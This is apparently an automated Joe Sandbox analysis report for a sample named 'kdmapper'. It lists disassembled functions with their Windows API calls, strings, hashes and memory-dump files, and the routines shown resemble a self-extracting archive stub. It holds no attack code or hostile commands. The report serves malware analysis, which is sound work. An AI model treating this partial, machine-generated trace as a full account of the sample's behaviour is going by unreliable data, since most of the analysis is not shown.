DXGIDebug.dll, xrefs: 00DF08FC, 00DF0C5E
`@, xrefs: 00DF0A6C
H@, xrefs: 00DF0A61
h>, xrefs: 00DF099F
D=, xrefs: 00DF0CB9, 00DF0CC9
H?, xrefs: 00DF09F3
(=, xrefs: 00DF092F
,<, xrefs: 00DF08E7
T=, xrefs: 00DF093F
kernel32, xrefs: 00DF0873
,@, xrefs: 00DF0A56
P>, xrefs: 00DF0997
?, xrefs: 00DF0A35
dA, xrefs: 00DF0AE5
|@, xrefs: 00DF0A77
0A, xrefs: 00DF0ACF
|<, xrefs: 00DF0B9E, 00DF0BA2
A, xrefs: 00DF0B1C
>, xrefs: 00DF09C7
SetDllDirectoryW, xrefs: 00DF0888
HA, xrefs: 00DF0ADA
@, xrefs: 00DF0AAE

Memory Dump Source

Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true

Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd

Similarity

API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite__vswprintf_c_l_wcslen
String ID: (=$,<$,@$0?$0A$4B$8>$D=$DXGIDebug.dll$H?$H@$HA$P>$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$T=$`@$d?$dA$dwmapi.dll$h=$h>$kernel32$uxtheme.dll$|<$|?$|@$<$>$?$@$A
API String ID: 1207345701-31210346
Opcode ID: 48793696fa5d5f6041e933c14ff0111e23646736139dc58782cc2fa4953736d3
Instruction ID: e50860aa829671e06f3ecae89f407dc4d50d4f260f852f5b1bc5542daa5648ca
Opcode Fuzzy Hash: 48793696fa5d5f6041e933c14ff0111e23646736139dc58782cc2fa4953736d3
Instruction Fuzzy Hash: 23D166B1104384AFD720DF61984AADFBAE8FBC9704F51991DF285B7251C7708689CB72

Function 00DFC73F Relevance: 47.7, APIs: 23, Strings: 4, Instructions: 428
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog.LIBCMT ref: 00DFC744

Part of subcall function 00DFB314: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 00DFB3FB

Part of subcall function 00DFAF98: _wcschr.LIBVCRUNTIME ref: 00DFB033

_wcslen.LIBCMT ref: 00DFCA0A
_wcslen.LIBCMT ref: 00DFCA13
SetWindowTextW.USER32(?,?), ref: 00DFCA71
_wcslen.LIBCMT ref: 00DFCAB3
_wcsrchr.LIBVCRUNTIME ref: 00DFCBFB
GetDlgItem.USER32(?,00000066), ref: 00DFCC36
SetWindowTextW.USER32(00000000,?), ref: 00DFCC46
SendMessageW.USER32(00000000,00000143,00000000,00E2A472), ref: 00DFCC54
SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00DFCC7F

Strings

<br>, xrefs: 00DFC9D4
%s.%d.tmp, xrefs: 00DFC940
ProgramFilesDir, xrefs: 00DFCB45
Software\Microsoft\Windows\CurrentVersion, xrefs: 00DFCB1A

Memory Dump Source

Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true

Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd

Similarity

API ID: _wcslen$MessageSendTextWindow$EnvironmentExpandH_prologItemStrings_wcschr_wcsrchr
String ID: %s.%d.tmp$<br>$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
API String ID: 986293930-312220925
Opcode ID: 57bfbcda861d36cbb8ee61134482c827469c286657d731e39cb067d12e649008
Instruction ID: 3758063dc0cc76f949cc1aecf77d7a0bc595031bbfc2a091f9d01e9576d6cef8
Opcode Fuzzy Hash: 57bfbcda861d36cbb8ee61134482c827469c286657d731e39cb067d12e649008
Instruction Fuzzy Hash: 02E161B290025CAADB24EBA4DD85DFE77BCEB04310F0591A6F749E3041EB749A858F70

Function 00DEDA67 Relevance: 26.9, APIs: 5, Strings: 10, Instructions: 663COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00DEDA70
_wcschr.LIBVCRUNTIME ref: 00DEDA91
GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00DEDAAC

Part of subcall function 00DEC29A: _wcslen.LIBCMT ref: 00DEC2A2

Part of subcall function 00DF05DA: _wcslen.LIBCMT ref: 00DF05E0

Part of subcall function 00DF1B84: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,00DEBAE9,00000000,?,?,?,00010420), ref: 00DF1BA0

_wcslen.LIBCMT ref: 00DEDDE9
__fprintf_l.LIBCMT ref: 00DEDF1C

Strings

*messages***, xrefs: 00DEDBC1
R, xrefs: 00DEDC0C
a, xrefs: 00DEDC16
$%s:, xrefs: 00DEDEFF
*messages***, xrefs: 00DEDBFA
@%s:, xrefs: 00DEDF06, 00DEDF12
9, xrefs: 00DEDDD0
, xrefs: 00DEDD6C
,, xrefs: 00DEDF57
RTL, xrefs: 00DEDEDE

Memory Dump Source

Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true

Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd

Similarity

API ID: _wcslen$ByteCharFileH_prologModuleMultiNameWide__fprintf_l_wcschr
String ID: $ ,$$%s:$*messages***$*messages***$@%s:$R$RTL$a$9
API String ID: 557298264-1836506137
Opcode ID: 5fa22cf82c0a7da77fa521372f9d792e1ce5aa26c50b376b1da6dafbf67772c4
Instruction ID: d0e5e39dd412971772d19e72939a2f083582eb85417d9473852580f4317b80a5
Opcode Fuzzy Hash: 5fa22cf82c0a7da77fa521372f9d792e1ce5aa26c50b376b1da6dafbf67772c4
Instruction Fuzzy Hash: 9532E0719002989BCF24FF69C841AEE77A9FF48700F44411AFA45AB281EBB1DD85CB70

Function 00DFD4D4 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 97
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00DFB568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00DFB579
Part of subcall function 00DFB568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00DFB58A
Part of subcall function 00DFB568: IsDialogMessageW.USER32(00010420,?), ref: 00DFB59E
Part of subcall function 00DFB568: TranslateMessage.USER32(?), ref: 00DFB5AC
Part of subcall function 00DFB568: DispatchMessageW.USER32(?), ref: 00DFB5B6

GetDlgItem.USER32(00000068,00E3FCB8), ref: 00DFD4E8
ShowWindow.USER32(00000000,00000005,?,?,?,00DFAF07,00000001,?,?,00DFB7B9,00E1506C,00E3FCB8,00E3FCB8,00001000,00000000,00000000), ref: 00DFD510
SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00DFD51B
SendMessageW.USER32(00000000,000000C2,00000000,00E135F4), ref: 00DFD529
SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00DFD53F
SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 00DFD559
SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00DFD59D
SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 00DFD5AB
SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00DFD5BA
SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00DFD5E1
SendMessageW.USER32(00000000,000000C2,00000000,00E143F4), ref: 00DFD5F0

Strings

\, xrefs: 00DFD549

Memory Dump Source

Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true

Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd

Similarity

API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
String ID: \
API String ID: 3569833718-2967466578
Opcode ID: f5b3aaaff4ccf8ed217dc3309e5daaf7c646df22089385a281a7f7653a6ea00d
Instruction ID: e9c406cad7029f389f34a82bb9cd8dda02bd6b385547fbe7a3f891a87f8720ee
Opcode Fuzzy Hash: f5b3aaaff4ccf8ed217dc3309e5daaf7c646df22089385a281a7f7653a6ea00d
Instruction Fuzzy Hash: 77310475145346BFE311DF31DC0AFAB7FADEB83708F000608F651A6290DBA48A0A8776

Function 00DFD78F Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 184
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_wcslen.LIBCMT ref: 00DFD7AE
ShellExecuteExW.SHELL32(?), ref: 00DFD8DE
ShowWindow.USER32(?,00000000), ref: 00DFD91D
GetExitCodeProcess.KERNEL32(?,?), ref: 00DFD959
CloseHandle.KERNEL32(?), ref: 00DFD97F
ShowWindow.USER32(?,00000001), ref: 00DFD9E1

Strings

.exe, xrefs: 00DFD989
.inf, xrefs: 00DFD89A

Memory Dump Source

Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true

Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd

Similarity

API ID: ShowWindow$CloseCodeExecuteExitHandleProcessShell_wcslen
String ID: .exe$.inf
API String ID: 36480843-3750412487
Opcode ID: b93c259c5cb70fa3283a61913a0463f4dee52abcaeabd04c5268ab41023ecb2a
Instruction ID: a07a8899bc1826f9894ef3374f3e282cafce4097174dd7e5548f0d27ab88c4ed
Opcode Fuzzy Hash: b93c259c5cb70fa3283a61913a0463f4dee52abcaeabd04c5268ab41023ecb2a
Instruction Fuzzy Hash: 3351F5714043889EDB309F65D8447BBBBE7AF81744F0A841EFAC4A7191D7B18989CB72

Function 00E0A95B Relevance: 9.2, APIs: 6, Instructions: 216
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00E05695,00E05695,?,?,?,00E0ABAC,00000001,00000001,2DE85006), ref: 00E0A9B5
MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00E0ABAC,00000001,00000001,2DE85006,?,?,?), ref: 00E0AA3B
WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,2DE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00E0AB35
__freea.LIBCMT ref: 00E0AB42

Part of subcall function 00E08E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00E0CA2C,00000000,?,00E06CBE,?,00000008,?,00E091E0,?,?,?), ref: 00E08E38

__freea.LIBCMT ref: 00E0AB4B
__freea.LIBCMT ref: 00E0AB70

Memory Dump Source

Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true

Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd

Similarity

API ID: ByteCharMultiWide__freea$AllocateHeap
String ID:
API String ID: 1414292761-0
Opcode ID: 39e0d3ecaf81b42f05058ec68855f5a2b084b25af6b9fad4175ea024d53dfaf8
Instruction ID: 6166572de8085323cbfab969783c20a912fc25e7a5ca57c8b94a5c6ca97a8286
Opcode Fuzzy Hash: 39e0d3ecaf81b42f05058ec68855f5a2b084b25af6b9fad4175ea024d53dfaf8
Instruction Fuzzy Hash: 3151A17261031AAFDB258E64CC41EBBB7AAEB44754B195639FD04F61C0DB34DCD0CA91

Function 00E03B72 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 63
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FreeLibrary.KERNEL32(00000000,?,?,?,00E03C35,?,?,00E42088,00000000,?,00E03D60,00000004,InitializeCriticalSectionEx,00E16394,InitializeCriticalSectionEx,00000000), ref: 00E03C03

Strings

api-ms-, xrefs: 00E03BC3

Memory Dump Source

Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true

Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd

Similarity

API ID: FreeLibrary
String ID: api-ms-
API String ID: 3664257935-2084034818
Opcode ID: 4e57c5885e076a5b0585981ebe686c5e7f6451eb1607d1a384f0cbfb32ebb908
Instruction ID: 1ecb88e3467036efec18f7854c249664907bc09e7a1d1e00e7d23ac46233cb07
Opcode Fuzzy Hash: 4e57c5885e076a5b0585981ebe686c5e7f6451eb1607d1a384f0cbfb32ebb908
Instruction Fuzzy Hash: 2211E335A45220AFCB328B799C41B9D77A89F01778F211111E915FB2D0E770EF848AD0

Function 00DE98E0 Relevance: 7.6, APIs: 5, Instructions: 111
filetimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(?,?,?,00000000,00000003,08000000,00000000,?,00000000,?,?,00DE7760,?,00000005,?,00000011), ref: 00DE995F
GetLastError.KERNEL32(?,?,00DE7760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00DE996C
CreateFileW.KERNEL32(00000000,?,?,00000000,00000003,08000000,00000000,?,?,00000800,?,?,00DE7760,?,00000005,?), ref: 00DE99A2
GetLastError.KERNEL32(?,?,00DE7760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00DE99AA
SetFileTime.KERNEL32(00000000,00000000,000000FF,00000000,?,00DE7760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00DE99F9

Memory Dump Source

Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true

Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd

Similarity

API ID: File$CreateErrorLast$Time
String ID:
API String ID: 1999340476-0
Opcode ID: 5d8e8fbde5b8f9fce91a704d69983e7375528f88081f064e85c77e0419f9a838
Instruction ID: b5faa430df199448088d46f456de34db9af0619b2350241bf5eee5f77655acb0
Opcode Fuzzy Hash: 5d8e8fbde5b8f9fce91a704d69983e7375528f88081f064e85c77e0419f9a838
Instruction Fuzzy Hash: B13113305453856FE730AF26CC46BEAFBD4BB04320F141B19F9A1961D2D3A4A988CFB1

Function 00DFABAB Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetClassNameW.USER32(?,?,00000050), ref: 00DFABC2
SHAutoComplete.SHLWAPI(?,00000010), ref: 00DFABF9

Part of subcall function 00DF1FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,00DEC116,00000000,.exe,?,?,00000800,?,?,?,00DF8E3C), ref: 00DF1FD1

FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 00DFABE9

Strings

EDIT, xrefs: 00DFABCD, 00DFABD8, 00DFABE5

Memory Dump Source

Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true

Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd

Similarity

API ID: AutoClassCompareCompleteFindNameStringWindow
String ID: EDIT
API String ID: 4243998846-3080729518
Opcode ID: b47aca23fa7f529084335535ad285f88fb95a502034bcfa1020a7088af5605d8
Instruction ID: a4b56a49b7f1cdc650390fc1b3f6d9c37d2473f62cb7980feb258b74fd4090a1
Opcode Fuzzy Hash: b47aca23fa7f529084335535ad285f88fb95a502034bcfa1020a7088af5605d8
Instruction Fuzzy Hash: 22F0827660022D7ADB3096699C0AFEB776C9F46B41F4E8112BB09B21C0D760DA46C5B6

Function 00DFAC16 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 34
comCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00DF081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00DF0836
Part of subcall function 00DF081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00DEF2D8,Crypt32.dll,00000000,00DEF35C,?,?,00DEF33E,?,?,?), ref: 00DF0858

OleInitialize.OLE32(00000000), ref: 00DFAC2F
GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00DFAC66
SHGetMalloc.SHELL32(00E28438), ref: 00DFAC70

Strings

riched20.dll, xrefs: 00DFAC1E

Memory Dump Source

Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true

Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd

Similarity

API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
String ID: riched20.dll
API String ID: 3498096277-3360196438
Opcode ID: ca3d7288377b5cb58d6efc8b4a6981a06886c3a3ff0a948f0718cb0737dc73e8
Instruction ID: 5395c4371c61b36d8740b72c149b5f4d03726217f58d59a7ce58fff57b688235
Opcode Fuzzy Hash: ca3d7288377b5cb58d6efc8b4a6981a06886c3a3ff0a948f0718cb0737dc73e8
Instruction Fuzzy Hash: B9F049B5D00209AFCB10AFAAD8499EFFFFCEF85700F10411AA811B2241CBB456068BA1

Function 00DFDBDE Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 31
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 00DFDBF4
SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 00DFDC30

Strings

sfxcmd, xrefs: 00DFDBEF
sfxpar, xrefs: 00DFDC2B

Memory Dump Source

Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true

Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd

Similarity

API ID: EnvironmentVariable
String ID: sfxcmd$sfxpar
API String ID: 1431749950-3493335439
Opcode ID: c20ae2201e3a1e0672e37c54a9d704840743f7dfa91ac82a12bc25f53aaf7e56
Instruction ID: 26c1efb39199fae82bb4b342c4a71aaa5b6a63073f84146614203ab689657303
Opcode Fuzzy Hash: c20ae2201e3a1e0672e37c54a9d704840743f7dfa91ac82a12bc25f53aaf7e56
Instruction Fuzzy Hash: 9DF0ECB350532CBBDB211F959C06BFA3B9AEF08B81B058411FF85A6052D6F08980D6B0

Function 00DE9785 Relevance: 6.1, APIs: 4, Instructions: 56
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetStdHandle.KERNEL32(000000F6), ref: 00DE9795
ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 00DE97AD
GetLastError.KERNEL32 ref: 00DE97DF
GetLastError.KERNEL32 ref: 00DE97FE

Memory Dump Source

Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true

Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd

Similarity

API ID: ErrorLast$FileHandleRead
String ID:
API String ID: 2244327787-0
Opcode ID: 7639ec737557fc8c77ea519868d9ccc75bc77c5eaa6911638122014a52862e0f
Instruction ID: d3a750da6a18d918a799e8a0d2f98d684e3a56c7afad4c85002c302b8d00b631
Opcode Fuzzy Hash: 7639ec737557fc8c77ea519868d9ccc75bc77c5eaa6911638122014a52862e0f
Instruction Fuzzy Hash: 7F11CE30912244EBDF20BF37C854AAEBBA9FF06360F148929F456952A0D770CE48DB71

Function 00E0AD34 Relevance: 6.1, APIs: 4, Instructions: 52
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00DED710,00000000,00000000,?,00E0ACDB,00DED710,00000000,00000000,00000000,?,00E0AED8,00000006,FlsSetValue), ref: 00E0AD66
GetLastError.KERNEL32(?,00E0ACDB,00DED710,00000000,00000000,00000000,?,00E0AED8,00000006,FlsSetValue,00E17970,FlsSetValue,00000000,00000364,?,00E098B7), ref: 00E0AD72
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00E0ACDB,00DED710,00000000,00000000,00000000,?,00E0AED8,00000006,FlsSetValue,00E17970,FlsSetValue,00000000), ref: 00E0AD80

Memory Dump Source

Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true

Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: b8d4190e516937e9f149e338f3a034df7a2071873aba66166892c0e1e5d0e816
Instruction ID: 2d86b89a9c450ee20ff7feb4fb38b0499cebde2f23d981d37a7d1afb446f66f4
Opcode Fuzzy Hash: b8d4190e516937e9f149e338f3a034df7a2071873aba66166892c0e1e5d0e816
Instruction Fuzzy Hash: FA014C3621132AAFC7314E799C449DB7B98EF457AA7184234F906F35D0C730C845C6E1

Function 00E0BA27 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 91COMMON

Download Yara Rule

APIs

Part of subcall function 00E097E5: GetLastError.KERNEL32(?,00E21030,00E04674,00E21030,?,?,00E03F73,00000050,?,00E21030,00000200), ref: 00E097E9
Part of subcall function 00E097E5: _free.LIBCMT ref: 00E0981C
